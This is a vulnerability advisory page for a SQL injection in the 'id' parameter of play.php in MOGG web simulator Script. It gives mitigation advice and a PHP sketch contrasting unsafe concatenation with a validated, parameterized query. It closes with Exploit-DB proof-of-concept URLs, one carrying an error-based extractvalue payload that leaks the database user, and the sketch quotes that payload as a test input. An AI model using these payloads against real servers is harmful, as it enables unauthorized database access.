Vendor: MOGG web simulator Script
By: Meisam Monsef
CVSS: 8.8 (HIGH)
CWE: 89 (SQL Injection)
Product Name: MOGG web simulator Script
Affected Version From: All Version
Affected Version To: All Version
Patch Exists: No
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: N/A
Year: 2018

MOGG web simulator Script – SQL Injection

A SQL injection vulnerability exists in MOGG web simulator Script, which could allow an attacker to execute arbitrary SQL commands. The vulnerability is due to insufficient sanitization of user-supplied input in the 'id' parameter of the 'play.php' script. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable script. Successful exploitation of this vulnerability could result in unauthorized access to sensitive information, or allow an attacker to modify data in the back-end database.

Mitigation:

The best way to mitigate this vulnerability is to use parameterized queries and to validate user input.
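
The sketch below is an added example, not code from the MOGG project or from the advisory. It contrasts string concatenation with integer validation plus a bound parameter for an 'id' lookup like the one in 'play.php'. The table `games`, its columns, both function names and the in-memory SQLite database are assumptions made so the example runs offline.

```php
<?php
declare(strict_types=1);

// Hypothetical stand-in for the lookup in play.php. The table name `games`,
// its columns and the function names are assumptions, not the project's code.

// Vulnerable pattern: the raw id is concatenated into the SQL text, so a quote
// in the value ends the string literal and the rest is parsed as SQL.
function build_query_unsafe(string $rawId): string
{
    return "SELECT id, name FROM games WHERE id = '" . $rawId . "'";
}

// Hardened pattern: validate the id as a positive integer, then bind it.
// Returns the row, or null for invalid input, no match, or a database error.
function find_game(PDO $db, string $rawId): ?array
{
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null; // reject anything that is not a plain integer
    }
    try {
        $stmt = $db->prepare('SELECT id, name FROM games WHERE id = :id');
        $stmt->bindValue(':id', $id, PDO::PARAM_INT);
        $stmt->execute();
        $row = $stmt->fetch(PDO::FETCH_ASSOC);
        return $row === false ? null : $row;
    } catch (PDOException $e) {
        // Log server-side only; echoing database errors to the client is what
        // makes error-based extraction (the extractvalue() request) readable.
        error_log('play.php lookup failed: ' . $e->getMessage());
        return null;
    }
}

// Constructed demo data in an in-memory SQLite database (requires pdo_sqlite).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE games (id INTEGER PRIMARY KEY, name TEXT)');
$db->exec("INSERT INTO games (id, name) VALUES (7, 'constructed sample game')");

// The second value is the request parameter from the page, URL-decoded.
$inputs = ['7', "99999' and extractvalue(1,concat(0x3a,user(),0x3a))#"];
foreach ($inputs as $raw) {
    echo build_query_unsafe($raw), PHP_EOL;          // SQL text the unsafe pattern would send
    echo json_encode(find_game($db, $raw)), PHP_EOL; // result of the hardened lookup
}
```

The unsafe builder is only printed, never executed, so the difference in the generated SQL text is visible without a MySQL server.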

Exploit-DB raw data:

# Exploit Title: MOGG web simulator Script - SQL Injection
# Date: 2018-10-29
# Exploit Author: Meisam Monsef - meisamrce@gmail.com - @meisamrce - @dorsateam
# Vendor Homepage: https://github.com/spider312/mtgas
# Version: All Version


Exploit :
http://server/play.php?id=99999'+[SQL Command]+#
http://server/play.php?id=99999%27+and+extractvalue(1,concat(0x3a,user(),0x3a))%23